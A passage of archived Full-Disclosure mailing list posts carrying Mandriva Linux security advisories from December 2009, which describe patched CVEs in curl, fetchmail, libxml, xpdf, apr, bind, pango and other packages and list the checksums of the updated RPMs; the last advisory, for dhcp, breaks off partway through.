[Full-disclosure] [ MDVSA-2009:203-1 ] curl

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:203-1
 http://www.mandriva.com/security/
 ___

 Package : curl
 Date: December 4, 2009
 Affected: 2008.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in curl:
 
 lib/ssluse.c in cURL and libcurl 7.4 through 7.19.5, when OpenSSL is
 used, does not properly handle a '\0' character in a domain name in
 the subject's Common Name (CN) field of an X.509 certificate, which
 allows man-in-the-middle attackers to spoof arbitrary SSL servers via
 a crafted certificate issued by a legitimate Certification Authority,
 a related issue to CVE-2009-2408 (CVE-2009-2417).
 
 This update provides a solution to this vulnerability.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2417
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 d1711e92c3f50c541bad2ebc92e1997e  2008.0/i586/curl-7.16.4-2.2mdv2008.0.i586.rpm
 7483d1c5e09cbdaa4091f7e005f844a1  
2008.0/i586/libcurl4-7.16.4-2.2mdv2008.0.i586.rpm
 59374804184515524a92e7032c15e27f  
2008.0/i586/libcurl-devel-7.16.4-2.2mdv2008.0.i586.rpm 
 82c7f004df0b5410c1bd0e4f245abf17  2008.0/SRPMS/curl-7.16.4-2.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 60168194a95389f0eef488361e9c41c6  
2008.0/x86_64/curl-7.16.4-2.2mdv2008.0.x86_64.rpm
 c7957352289282f49d0a749022d43309  
2008.0/x86_64/lib64curl4-7.16.4-2.2mdv2008.0.x86_64.rpm
 53be863ff6e89077c114c87646bf6435  
2008.0/x86_64/lib64curl-devel-7.16.4-2.2mdv2008.0.x86_64.rpm 
 82c7f004df0b5410c1bd0e4f245abf17  2008.0/SRPMS/curl-7.16.4-2.2mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLGFUgmqjQ0CJFipgRAmDvAKC9VSBsewBvAVxsvV4C0wnJ1xxdgwCfbhCU
IIyhdmnx2hBsXaVD3NWitv8=
=Nvbn
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2009:201-1 ] fetchmail

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:201-1
 http://www.mandriva.com/security/
 ___

 Package : fetchmail
 Date: December 4, 2009
 Affected: 2008.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in fetchmail:
 
 socket.c in fetchmail before 6.3.11 does not properly handle a '\0'
 (NUL) character in a domain name in the subject's Common Name (CN)
 and subjectAlt(ernative)Name fields of an X.509 certificate, which
 allows man-in-the-middle attackers to spoof arbitrary SSL servers via
 a crafted certificate issued by a legitimate Certification Authority,
 a related issue to CVE-2009-2408 (CVE-2009-2666).
 
 This update provides a solution to this vulnerability.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2666
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 3f4057bfc548c1dccf0d3f9bc4fe8f85  
2008.0/i586/fetchmail-6.3.8-4.2mdv2008.0.i586.rpm
 76bf19b1f8772966c5044109c348da26  
2008.0/i586/fetchmailconf-6.3.8-4.2mdv2008.0.i586.rpm
 e3e362ecde9e175a34d1df8d2188d59f  
2008.0/i586/fetchmail-daemon-6.3.8-4.2mdv2008.0.i586.rpm 
 1822d2316b99f4ffaa18e482ed29c7f6  
2008.0/SRPMS/fetchmail-6.3.8-4.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 a0f3f51fd21b8b002c55e7a189cfe4b4  
2008.0/x86_64/fetchmail-6.3.8-4.2mdv2008.0.x86_64.rpm
 31842cc17128e39c0626c6ce49b2b1e8  
2008.0/x86_64/fetchmailconf-6.3.8-4.2mdv2008.0.x86_64.rpm
 729ad2f72304f5611c67095bac5d  
2008.0/x86_64/fetchmail-daemon-6.3.8-4.2mdv2008.0.x86_64.rpm 
 1822d2316b99f4ffaa18e482ed29c7f6  
2008.0/SRPMS/fetchmail-6.3.8-4.2mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLGFJGmqjQ0CJFipgRAiJLAJ9AT7DMQJoM2Ogh8Jy4KQukg+9AuQCfY/eE
rt2NtIHert3paSccxoYh9pI=
=VakF
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2009:200-1 ] libxml

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:200-1
 http://www.mandriva.com/security/
 ___

 Package : libxml
 Date: December 4, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Multiple vulnerabilities has been found and corrected in libxml:
 
 Stack consumption vulnerability in libxml2 2.5.10, 2.6.16, 2.6.26,
 2.6.27, and 2.6.32, and libxml 1.8.17, allows context-dependent
 attackers to cause a denial of service (application crash) via a
 large depth of element declarations in a DTD, related to a function
 recursion, as demonstrated by the Codenomicon XML fuzzing framework
 (CVE-2009-2414).
 
 Multiple use-after-free vulnerabilities in libxml2 2.5.10, 2.6.16,
 2.6.26, 2.6.27, and 2.6.32, and libxml 1.8.17, allow context-dependent
 attackers to cause a denial of service (application crash) via crafted
 (1) Notation or (2) Enumeration attribute types in an XML file, as
 demonstrated by the Codenomicon XML fuzzing framework (CVE-2009-2416).
 
 This update provides a solution to these vulnerabilities.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2414
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2416
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 4c418296249dc8cc94b1b15e49b2d429  
2008.0/i586/libxml1-1.8.17-11.1mdv2008.0.i586.rpm
 7f55b33d9357641ccfbe9421c2818dc8  
2008.0/i586/libxml1-devel-1.8.17-11.1mdv2008.0.i586.rpm
 415af7a47df0783359018e7c8818123b  
2008.0/i586/libxml2_2-2.6.30-1.6mdv2008.0.i586.rpm
 44c479adb1d416beb45380e10398e350  
2008.0/i586/libxml2-devel-2.6.30-1.6mdv2008.0.i586.rpm
 affb65b84643897980a4db16bac8262d  
2008.0/i586/libxml2-python-2.6.30-1.6mdv2008.0.i586.rpm
 517f2690932d66302975469282a7f624  
2008.0/i586/libxml2-utils-2.6.30-1.6mdv2008.0.i586.rpm 
 1df8e776ad34bdfe5b68437e45718ff8  
2008.0/SRPMS/libxml-1.8.17-11.1mdv2008.0.src.rpm
 f9eee25ac518012b01c9f54fbab3b3d8  
2008.0/SRPMS/libxml2-2.6.30-1.6mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 5dcd354e680675ffd08c9f0d562e5686  
2008.0/x86_64/lib64xml1-1.8.17-11.1mdv2008.0.x86_64.rpm
 9ef4286da3bf35a2b07d1a86d63b577b  
2008.0/x86_64/lib64xml1-devel-1.8.17-11.1mdv2008.0.x86_64.rpm
 09b50a18697fc91e9c801c3a8ffe83b4  
2008.0/x86_64/lib64xml2_2-2.6.30-1.6mdv2008.0.x86_64.rpm
 4453c937d9dfabdc9526f253fe0a14aa  
2008.0/x86_64/lib64xml2-devel-2.6.30-1.6mdv2008.0.x86_64.rpm
 2ab42a3413a471384a6e280d7afc3c90  
2008.0/x86_64/libxml2-python-2.6.30-1.6mdv2008.0.x86_64.rpm
 3e3127451a7348e2ef8e4990122c3518  
2008.0/x86_64/libxml2-utils-2.6.30-1.6mdv2008.0.x86_64.rpm 
 1df8e776ad34bdfe5b68437e45718ff8  
2008.0/SRPMS/libxml-1.8.17-11.1mdv2008.0.src.rpm
 f9eee25ac518012b01c9f54fbab3b3d8  
2008.0/SRPMS/libxml2-2.6.30-1.6mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLGE/cmqjQ0CJFipgRAk/PAKCz43qimvWl4XvfLCAWGlKd7OlgHACgsV/X
APy0BqGd7fLxPXDfkwOAKKg=
=tR4I
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2009:287-1 ] xpdf

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:287-1
 http://www.mandriva.com/security/
 ___

 Package : xpdf
 Date: December 4, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Multiple vulnerabilities has been found and corrected in xpdf:
 
 Integer overflow in the SplashBitmap::SplashBitmap function in Xpdf 3.x
 before 3.02pl4 and Poppler before 0.12.1 might allow remote attackers
 to execute arbitrary code via a crafted PDF document that triggers a
 heap-based buffer overflow.  NOTE: some of these details are obtained
 from third party information.  NOTE: this issue reportedly exists
 because of an incomplete fix for CVE-2009-1188 (CVE-2009-3603).
 
 The Splash::drawImage function in Splash.cc in Xpdf 2.x and 3.x
 before 3.02pl4, and Poppler 0.x, as used in GPdf and kdegraphics KPDF,
 does not properly allocate memory, which allows remote attackers to
 cause a denial of service (application crash) or possibly execute
 arbitrary code via a crafted PDF document that triggers a NULL pointer
 dereference or a heap-based buffer overflow (CVE-2009-3604).
 
 Integer overflow in the PSOutputDev::doImageL1Sep function in Xpdf
 before 3.02pl4, and Poppler 0.x, as used in kdegraphics KPDF, might
 allow remote attackers to execute arbitrary code via a crafted PDF
 document that triggers a heap-based buffer overflow (CVE-2009-3606).
 
 Integer overflow in the ObjectStream::ObjectStream function in XRef.cc
 in Xpdf 3.x before 3.02pl4 and Poppler before 0.12.1, as used in
 GPdf, kdegraphics KPDF, CUPS pdftops, and teTeX, might allow remote
 attackers to execute arbitrary code via a crafted PDF document that
 triggers a heap-based buffer overflow (CVE-2009-3608).
 
 Integer overflow in the ImageStream::ImageStream function in Stream.cc
 in Xpdf before 3.02pl4 and Poppler before 0.12.1, as used in GPdf,
 kdegraphics KPDF, and CUPS pdftops, allows remote attackers to
 cause a denial of service (application crash) via a crafted PDF
 document that triggers a NULL pointer dereference or buffer over-read
 (CVE-2009-3609).
 
 This update fixes these vulnerabilities.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3603
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3604
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3606
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3608
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3609
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 83c9a032b3183ea645e58c0d0f5143ff  2008.0/i586/xpdf-3.02-8.3mdv2008.0.i586.rpm
 5f86604d615e3872176cec6aa6f27f60  
2008.0/i586/xpdf-common-3.02-8.3mdv2008.0.i586.rpm
 81a9a7f617d000ada7ce3f3ad34667b3  
2008.0/i586/xpdf-tools-3.02-8.3mdv2008.0.i586.rpm 
 ee385f975678b5fd6f5fb427d16f7b44  2008.0/SRPMS/xpdf-3.02-8.3mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 5a9c4a901fbe84c6a8fe3de44fd3cf78  
2008.0/x86_64/xpdf-3.02-8.3mdv2008.0.x86_64.rpm
 c193e9fd9fe46c3f433ecf8eaddb6944  
2008.0/x86_64/xpdf-common-3.02-8.3mdv2008.0.x86_64.rpm
 4446036c4bbb8d8895d9cad41a38ff04  
2008.0/x86_64/xpdf-tools-3.02-8.3mdv2008.0.x86_64.rpm 
 ee385f975678b5fd6f5fb427d16f7b44  2008.0/SRPMS/xpdf-3.02-8.3mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLGEpvmqjQ0CJFipgRAu4tAKDh5lUdwfU9ZVGfn1RgZPfnD5rjUgCggv8u
+lOKwrO5RFXbqUDTcXm3Ikk=
=Ivf3
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2009:314 ] apr

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2009:314
 http://www.mandriva.com/security/
 ___

 Package : apr
 Date: December 4, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Multiple security vulnerabilities has been identified and fixed in
 apr and apr-util:
 
 Multiple integer overflows in the Apache Portable Runtime (APR)
 library and the Apache Portable Utility library (aka APR-util)
 0.9.x and 1.3.x allow remote attackers to cause a denial of service
 (application crash) or possibly execute arbitrary code via vectors that
 trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc
 function in memory/unix/apr_pools.c in APR; or crafted calls to
 the (3) apr_rmm_malloc, (4) apr_rmm_calloc, or (5) apr_rmm_realloc
 function in misc/apr_rmm.c in APR-util; leading to buffer overflows.
 NOTE: some of these details are obtained from third party information
 (CVE-2009-2412).
 
 The apr_strmatch_precompile function in strmatch/apr_strmatch.c in
 Apache APR-util before 1.3.5 allows remote attackers to cause a denial
 of service (daemon crash) via crafted input involving (1) a .htaccess
 file used with the Apache HTTP Server, (2) the SVNMasterURI directive
 in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2
 module for the Apache HTTP Server, or (4) an application that uses
 the libapreq2 library, related to an underflow flaw. (CVE-2009-0023).
 
 The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in
 Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn
 modules in the Apache HTTP Server, allows remote attackers to
 cause a denial of service (memory consumption) via a crafted XML
 document containing a large number of nested entity references, as
 demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564
 (CVE-2009-1955).
 
 Off-by-one error in the apr_brigade_vprintf function in Apache APR-util
 before 1.3.5 on big-endian platforms allows remote attackers to obtain
 sensitive information or cause a denial of service (application crash)
 via crafted input (CVE-2009-1956).
 
 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 
 The updated packages have been patched to prevent this.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2412
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0023
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1955
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1956
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 d55d5dd456de0c7977f93bff217406d7  
2008.0/i586/apr-util-dbd-mysql-1.2.10-1.1mdv2008.0.i586.rpm
 bd02eb2233dcc07aadd7e5eb84df9ce8  
2008.0/i586/apr-util-dbd-pgsql-1.2.10-1.1mdv2008.0.i586.rpm
 334e127fb8ac03379c8a5f2ee7c144b6  
2008.0/i586/apr-util-dbd-sqlite3-1.2.10-1.1mdv2008.0.i586.rpm
 4307983fb3d21ab0f9955711e116f92e  
2008.0/i586/libapr1-1.2.11-1.1mdv2008.0.i586.rpm
 ff24f1e1587f2210346ea134d4a2053e  
2008.0/i586/libapr-devel-1.2.11-1.1mdv2008.0.i586.rpm
 3d50a85109e011ced9e36f1565e9bc69  
2008.0/i586/libapr-util1-1.2.10-1.1mdv2008.0.i586.rpm
 b786e2329fc63d459b841bf001261543  
2008.0/i586/libapr-util-devel-1.2.10-1.1mdv2008.0.i586.rpm 
 6ef7669ea3d0db3dbaed35f35ae2dbdc  2008.0/SRPMS/apr-1.2.11-1.1mdv2008.0.src.rpm
 1a923fc9c2f912ef339b942a59bff4e6  
2008.0/SRPMS/apr-util-1.2.10-1.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 91588bbcf3940cd106b0fe458be6d4b9  
2008.0/x86_64/apr-util-dbd-mysql-1.2.10-1.1mdv2008.0.x86_64.rpm
 b71d8b14cc536cf8a2448b353d2b4047  
2008.0/x86_64/apr-util-dbd-pgsql-1.2.10-1.1mdv2008.0.x86_64.rpm
 10b889bb625dbae01711ed7e8e101744  
2008.0/x86_64/apr-util-dbd-sqlite3-1.2.10-1.1mdv2008.0.x86_64.rpm
 068334fc392c68f9b29e629dd3776f83  
2008.0/x86_64/lib64apr1-1.2.11-1.1mdv2008.0.x86_64.rpm
 a9ed011d8b421e8604e66a87a4972477  
2008.0/x86_64/lib64apr-devel-1.2.11-1.1mdv2008.0.x86_64.rpm
 c08da53c4c88464249f46c6577f3c2a8  
2008.0/x86_64/lib64apr-util1-1.2.10-1.1mdv2008.0.x86_64.rpm
 4b1b86a3e07f4b87a1a53f0dbaaa3aff  
2008.0/x86_64/lib64apr-util-devel-1.2.10-1.1mdv2008.0.x86_64.rpm 
 6ef7669ea3d0db3dbaed35f35ae2dbdc  2008.0/SRPMS/apr-1.2.11-1.1mdv2008.0.src.rpm
 1a923fc9c2f912ef339b942a59bff4e6  
2008.0/SRPMS/apr-util-1.2.10-1.1mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team 

[Full-disclosure] [ MDVSA-2009:313-1 ] bind

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:313-1
 http://www.mandriva.com/security/
 ___

 Package : bind
 Date: December 3, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Some vulnerabilities were discovered and corrected in bind:
 
 Unspecified vulnerability in ISC BIND 9.4 before 9.4.3-P4, 9.5
 before 9.5.2-P1, 9.6 before 9.6.1-P2, 9.7 beta before 9.7.0b3,
 and 9.0.x through 9.3.x with DNSSEC validation enabled and checking
 disabled (CD), allows remote attackers to conduct DNS cache poisoning
 attacks via additional sections in a response sent for resolution
 of a recursive client query, which is not properly handled when the
 response is processed at the same time as requesting DNSSEC records
 (DO). (CVE-2009-4022).
 
 Additionally BIND has been upgraded to the latest point release or
 closest supported version by ISC.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4022
 https://www.isc.org/node/504
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 9cd003fb37a121f79e78b1c14094b7db  2008.0/i586/bind-9.4.3-0.1mdv2008.0.i586.rpm
 7f07d510e3a8e1dfe311020bf86b599f  
2008.0/i586/bind-devel-9.4.3-0.1mdv2008.0.i586.rpm
 fb8c5352c8a603bdd3f89e6051a2c48e  
2008.0/i586/bind-utils-9.4.3-0.1mdv2008.0.i586.rpm 
 a82b381cd9675db308d95aee3fa5502f  2008.0/SRPMS/bind-9.4.3-0.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 1ac44bf21e8144fb7c4bf49b0c9e094f  
2008.0/x86_64/bind-9.4.3-0.1mdv2008.0.x86_64.rpm
 2453e9625b1852561f6b6b6ebf17fdb2  
2008.0/x86_64/bind-devel-9.4.3-0.1mdv2008.0.x86_64.rpm
 f8f5a39a4d1b33fef6a5441288fe0aa7  
2008.0/x86_64/bind-utils-9.4.3-0.1mdv2008.0.x86_64.rpm 
 a82b381cd9675db308d95aee3fa5502f  2008.0/SRPMS/bind-9.4.3-0.1mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLGD4rmqjQ0CJFipgRAhfBAKDM3qLy6hw6/OjXZ18RCpj1hlxD0QCgiovL
RJQHrdXqJsbK3toYp4tvwDQ=
=CnAu
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2009:158-3 ] pango

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:158-3
 http://www.mandriva.com/security/
 ___

 Package : pango
 Date: December 3, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Integer overflow in the pango_glyph_string_set_size function in
 pango/glyphstring.c in Pango before 1.24 allows context-dependent
 attackers to cause a denial of service (application crash) or possibly
 execute arbitrary code via a long glyph string that triggers a
 heap-based buffer overflow.
 
 This update corrects the issue.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1194
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 5fa3cde904bb3471f2808597d4495a90  
2008.0/i586/libpango1.0_0-1.18.2-1.1mdv2008.0.i586.rpm
 70cd4862c5bc27ff2548ea082ef2562b  
2008.0/i586/libpango1.0_0-modules-1.18.2-1.1mdv2008.0.i586.rpm
 06a9a5a78ffa999cb12bd5de367789cc  
2008.0/i586/libpango1.0-devel-1.18.2-1.1mdv2008.0.i586.rpm
 77ca034f4f673aef5ef9a147e7fd6b10  
2008.0/i586/pango-1.18.2-1.1mdv2008.0.i586.rpm
 d57f4104fd1607dca80c7d4e8d775ae7  
2008.0/i586/pango-doc-1.18.2-1.1mdv2008.0.i586.rpm 
 1d01963df79f7762776dc35e4023ea5b  
2008.0/SRPMS/pango-1.18.2-1.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 1fdf6ef81c94fee53da3c154709483ad  
2008.0/x86_64/lib64pango1.0_0-1.18.2-1.1mdv2008.0.x86_64.rpm
 2a5831a2e8bdc4dcce62f8ecbe9f1dfd  
2008.0/x86_64/lib64pango1.0_0-modules-1.18.2-1.1mdv2008.0.x86_64.rpm
 18803302ca6edff9c50f9bb66e095e80  
2008.0/x86_64/lib64pango1.0-devel-1.18.2-1.1mdv2008.0.x86_64.rpm
 56a5dff6f3dc09912b22ea955970ae1c  
2008.0/x86_64/pango-1.18.2-1.1mdv2008.0.x86_64.rpm
 2b2fc7e5a1c7597dead4d6138089f7c3  
2008.0/x86_64/pango-doc-1.18.2-1.1mdv2008.0.x86_64.rpm 
 1d01963df79f7762776dc35e4023ea5b  
2008.0/SRPMS/pango-1.18.2-1.1mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLGDftmqjQ0CJFipgRAuWMAJ4/ig6FYR6485O/yz4etEfyCTIySgCghpQU
pNTF7F5vkWFvFfi8GU78a0E=
=sn6S
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2009:157-1 ] perl-Compress-Raw-Zlib

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:157-1
 http://www.mandriva.com/security/
 ___

 Package : perl-Compress-Raw-Zlib
 Date: December 3, 2009
 Affected: 2008.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in perl-Compress-Raw-Zlib:
 
 Off-by-one error in the inflate function in Zlib.xs in
 Compress::Raw::Zlib Perl module before 2.017, as used in AMaViS,
 SpamAssassin, and possibly other products, allows context-dependent
 attackers to cause a denial of service (hang or crash) via a crafted
 zlib compressed stream that triggers a heap-based buffer overflow,
 as exploited in the wild by Trojan.Downloader-71014 in June 2009
 (CVE-2009-1391).
 
 This update provides fixes for this vulnerability.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1391
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 c48dda4bf47776f250c73e2af40e3ceb  
2008.0/i586/perl-Compress-Raw-Zlib-2.006-1.1mdv2008.0.i586.rpm 
 65d8176b3c1285376533c0f16d5d264c  
2008.0/SRPMS/perl-Compress-Raw-Zlib-2.006-1.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 e6eeabfbd6bd0b9afe54fde0374327a1  
2008.0/x86_64/perl-Compress-Raw-Zlib-2.006-1.1mdv2008.0.x86_64.rpm 
 65d8176b3c1285376533c0f16d5d264c  
2008.0/SRPMS/perl-Compress-Raw-Zlib-2.006-1.1mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLGDVSmqjQ0CJFipgRAmACAKDISShfYkpOrXwSKS9lGpxVI7FVygCg37Sj
JISnjBHYvGdRn5Rj6anhHSg=
=9AfA
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2009:312 ] dhcp

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2009:312
 http://www.mandriva.com/security/
 ___

 Package : dhcp
 Date: December 3, 2009
 Affected: 2008.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in ISC DHCP:
 
 Integer overflow in the ISC dhcpd 3.0.x before 3.0.7 and 3.1.x before
 3.1.1; and the DHCP server in EMC VMware Workstation before 5.5.5 Build
